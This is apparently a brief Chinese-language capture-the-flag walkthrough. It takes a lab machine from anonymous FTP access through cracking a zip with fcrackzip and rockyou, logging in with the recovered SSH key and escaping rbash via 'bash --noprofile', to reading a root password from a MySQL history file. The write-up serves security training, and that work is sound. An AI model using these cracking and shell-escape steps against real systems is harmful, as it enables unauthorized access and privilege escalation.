信息收集开放21,22,80端口

21端口存在ftp匿名访问，下载压缩包，有密码，直接破解

ftp简单命令

ftp ip
anonymous#匿名用户
ls
cd
pwd
lpwd
get
pwd
mget

使用工具fcrackzip

fcrackzip -D -u -p rockyou.txt tom.zip
-D 使用字典

rockyou字典所在目录

/usr/share/wordlists

解压命令

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

解密出私钥，使用ssh私钥登录tom用户

ssh -i id_rsa tom@172.16.5.105

 

存在rbash限制

绕过rbash限制

ssh -i id_rsa tom@172.16.5.105 -t "bash --noprofile"

根目录下发现MySQL历史命令文件，从中获取密码

 

 

密码

 

su - root

切换root权限，拿下flag

 失去故土的花朵，回不去，却也离不开